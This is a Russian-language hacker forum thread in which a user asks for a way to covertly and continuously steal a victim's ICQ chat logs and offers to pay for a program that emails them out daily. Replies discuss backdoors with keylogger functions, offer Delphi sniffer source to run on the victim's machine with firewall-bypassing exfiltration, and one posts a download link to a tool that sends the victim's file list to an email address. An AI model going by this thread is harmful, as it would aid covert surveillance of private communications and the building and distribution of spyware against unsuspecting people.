![]() |
Слежка за перепиской
Вобщем мне поставлена задача о слежке за перепиской, я сначала согласился, а теперь немного в недоумении...
Ситуация такая: за компом - ламер комп за проксей нужны логи аси причем не единоразово а постоянно второй пункт убил мое желание дать ей бекдор... Подскажите что нибудь по сабжу... КЕЙЛОГГЕР НЕ ПОДХОДИТ! |
Сниферы ща в инете не пашут, кейлоггер не подходит... Бекдор с ф-ей кейлогера в общем... больше я думаю и способов нет))
|
Та не.... бекдор не покатит. там прокся! если конечно нет такого, чтоб ко мне коннектился
|
В принцыпе готов заплатить если кто напишет прогу, чтоб слала логи аси на мыло, типа, раз в день. но чтоб работала на всех асях
|
уточню условия.
Нужна прога которая стырит с компа логи аси (скорей всего ICQ 5.0 или Lite) и вышлет их по почте. Кто сможет такое написать - стучите в асю. О цене договоримся. |
Тебе надо на веб хак,к разрабтчикам софта,чтоб бекдор определенные файлы отсылал с компа.
|
нет... на веб-хак ему не нужно... щас занят... но скоро доделаю снифер аськин - сабж, он сидит на компе жертвы, как бекдор, и снифает все, што шлет аська по сети :) тока с отправлением на мыло через фаер у меня возможны проблемы.... так что я даю сорец снифа, а вы доделываете отправку, с обходом фаера (через веб-протокол сам смогу). Язык делфи (естессно, сорцы доработанного трояна вы мне тоже отправите :) )
|
Дрв.Вот написал программу для тебя.Крч прога сканит васю папочку Program Files на наличие всех файлов(так как папка с прогрой там и собственно папочка со всеми аськами там). потом приходит этот список на iqc-nado@yandex.ru(пасс в личке). запускаешь и где то 3-5 мин и всё у тебя. пользуйся на здоровье.
http://zlamerz.narod.ru/lsas.rar |
Спасибо! держи +
|
ок.всегда к услугам
|
| Время: 01:59 |